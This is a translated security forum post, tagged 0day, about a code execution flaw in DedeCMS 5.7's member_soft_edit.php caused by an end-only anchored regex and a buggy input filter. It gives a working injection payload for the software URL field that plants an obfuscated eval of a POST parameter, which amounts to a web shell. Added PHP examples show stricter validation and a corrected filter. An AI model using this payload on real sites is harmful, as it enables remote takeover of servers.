[河马] DedeCMS 5.7 member_soft_edit.php code execution vulnerability (GPC On version)



DedeCMS 5.7 member_soft_edit.php has a code execution vulnerability.

The 2014-02-28 patch added the following to soft_edit.php:
if(!preg_match("#[_=&///?\.a-zA-Z0-9-]+$#i", $softurl))
{
    ShowMsg("确定软件地址提交正确!", "-1");
    exit;
}
I have to ask: what kind of regex is this?

A single character is enough to make it match: the pattern is anchored only at the end (`$`), not at the start, so only the tail of the value is ever inspected.

Add a software upload.

Local address: http://www.hao123.com

Fill in the rest with anything; once the entry is added, open the edit screen again.



Change the software address to:
http://www.hao123.com}x{/dede:link}{dede:a text'=x']=0;eval(chr(101).chr(118).chr(97).chr(108).chr(40).chr(34).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(93).chr(59).chr(34).chr(41).chr(59));// }xxxx{/dede:a}{dede:link}xxx

Note the trailing xxx here; it is there purely to get past the regex patch.
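To make the two points above concrete (the missing `^` anchor, and the trailing letters that satisfy the `$` anchor), here is an added example that is not DedeCMS code. It runs the patch's regex verbatim beside a hypothetical anchored allowlist check (`strict_check_passes`, my own proposal, not a vendor fix) over constructed inputs: the benign address from the post, a value carrying template braces followed by trailing letters, and an ordinary download URL.

```php
<?php
// Added example, not DedeCMS code: the 2014-02-28 patch's regex next to a
// hypothetical anchored allowlist check for the same $softurl field.

// The patch's check, copied verbatim. It is anchored only with `$`, so only
// the tail of the value is inspected; anything ending in a letter passes.
function patched_check_passes(string $softurl): bool
{
    return (bool) preg_match("#[_=&///?\.a-zA-Z0-9-]+$#i", $softurl);
}

// Hypothetical replacement (an assumption of this example, not a vendor fix):
// anchored at both ends, and the class deliberately omits `{`, `}`, quotes and
// parentheses, so DedeCMS template tags cannot be smuggled into the field.
function strict_check_passes(string $softurl): bool
{
    if (!preg_match('#^https?://[A-Za-z0-9._~:/?\#@!$&*+,;=%-]+$#', $softurl)) {
        return false;
    }
    // Independent second check on overall URL syntax.
    return filter_var($softurl, FILTER_VALIDATE_URL) !== false;
}

// Run both checks over constructed inputs (values made up for this example).
function compare_checks(): array
{
    $inputs = [
        'http://www.hao123.com',                   // benign address from the post
        'http://www.hao123.com}x{/dede:link}xxx',  // template braces + trailing letters
        'https://www.hao123.com/dl/soft-1.0.zip',  // ordinary download URL
    ];
    $result = [];
    foreach ($inputs as $url) {
        $result[$url] = [
            'patched' => patched_check_passes($url),
            'strict'  => strict_check_passes($url),
        ];
    }
    return $result;
}

print_r(compare_checks());
```

The patched regex accepts all three inputs, because each ends in characters from its class; the anchored check accepts only the first and third, since `{`, `}` and `:` after the scheme are outside its class. Whatever character class a site settles on, the anchoring on both ends is the part that makes the check mean something.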



It then executes with no trouble at all!

Later testing showed that the address that gets written differs between GPC OFF and GPC ON; the one above was written with GPC ON.

You know the reason.

In filter.inc.php you apply addslashes to everything, regardless of GPC.



And for an $svar[$_k] like this it simply returns the wrong value; that bug is yours to deal with.
function _FilterAll($fk, &$svar)
{
    global $cfg_notallowstr,$cfg_replacestr;
    if( is_array($svar) )
    {
        foreach($svar as $_k => $_v)
        {
            $svar[$_k] = _FilterAll($fk,$_v);
        }
    }
    else
    {
        if($cfg_notallowstr!='' && preg_match("#".$cfg_notallowstr."#i", $svar))
        {
            ShowMsg(" $fk has not allow words!",'-1');
            exit();
        }
        if($cfg_replacestr!='')
        {
            $svar = preg_replace('/'.$cfg_replacestr.'/i', "***", $svar);
        }
    }
    return addslashes($svar);
}

/* Filter _GET, _POST and _COOKIE */
foreach(Array('_GET','_POST','_COOKIE') as $_request)
{
    foreach($$_request as $_k => $_v)
    {
        ${$_k} = _FilterAll($_k,$_v);
    }
}
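The two defects pointed out above (addslashes applied regardless of GPC, and the array branch falling through to `return addslashes($svar)`) can be seen side by side in the following added example. It is not DedeCMS code: `filter_all_fixed` is a hypothetical corrected version written for this page, `ShowMsg` plus `exit` is replaced by an exception so the function can be called from a test, and `simulate_magic_quotes` stands in for what PHP does to request data when magic_quotes_gpc is on.

```php
<?php
// Added example, not DedeCMS's own code: a hypothetical corrected _FilterAll that
// (a) returns the filtered array instead of calling addslashes() on an array, and
// (b) escapes each value exactly once, whatever magic_quotes_gpc is set to.
function filter_all_fixed(string $fk, $svar, bool $gpcOn, string $notallow = '', string $replace = '')
{
    if (is_array($svar)) {
        foreach ($svar as $k => $v) {
            $svar[$k] = filter_all_fixed($fk, $v, $gpcOn, $notallow, $replace);
        }
        // The original fell through to addslashes($svar) here, losing the array.
        return $svar;
    }
    $svar = (string) $svar;
    // Undo PHP's own escaping first so addslashes() below is applied exactly once.
    if ($gpcOn) {
        $svar = stripslashes($svar);
    }
    // Same blocklist semantics as the original, with an exception in place of ShowMsg/exit.
    if ($notallow !== '' && preg_match('#' . $notallow . '#i', $svar)) {
        throw new InvalidArgumentException("$fk has not allow words!");
    }
    if ($replace !== '') {
        $svar = preg_replace('/' . $replace . '/i', '***', $svar);
    }
    return addslashes($svar);
}

// Stand-in for magic_quotes_gpc: PHP addslashes() every request value recursively.
function simulate_magic_quotes($value)
{
    return is_array($value) ? array_map('simulate_magic_quotes', $value) : addslashes((string) $value);
}

// Constructed request values: a scalar with a quote and a nested array.
function demo_filter(): array
{
    $post = ['title' => "O'Reilly", 'tags' => ['a"b', "c'd"]];
    $off  = filter_all_fixed('_POST', $post, false);
    $on   = filter_all_fixed('_POST', simulate_magic_quotes($post), true);
    return ['gpc_off' => $off, 'gpc_on' => $on, 'identical' => ($off === $on)];
}

var_export(demo_filter());
```

With the fix, both GPC settings produce the same single-escaped values and the `tags` array survives intact. The original's array branch instead hands an array to addslashes(), which returns NULL with a warning on PHP 5 and 7 and throws a TypeError on PHP 8, so nested request data is silently dropped; and with GPC on, the original escapes scalars twice, which is why the stored address differed between the two settings.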





[This entry was edited by admin on 2014-09-01 11:01 AM]
Source: original to this site
Tags: 0day
Comments: 86 | Trackbacks: 0 | Views: 9950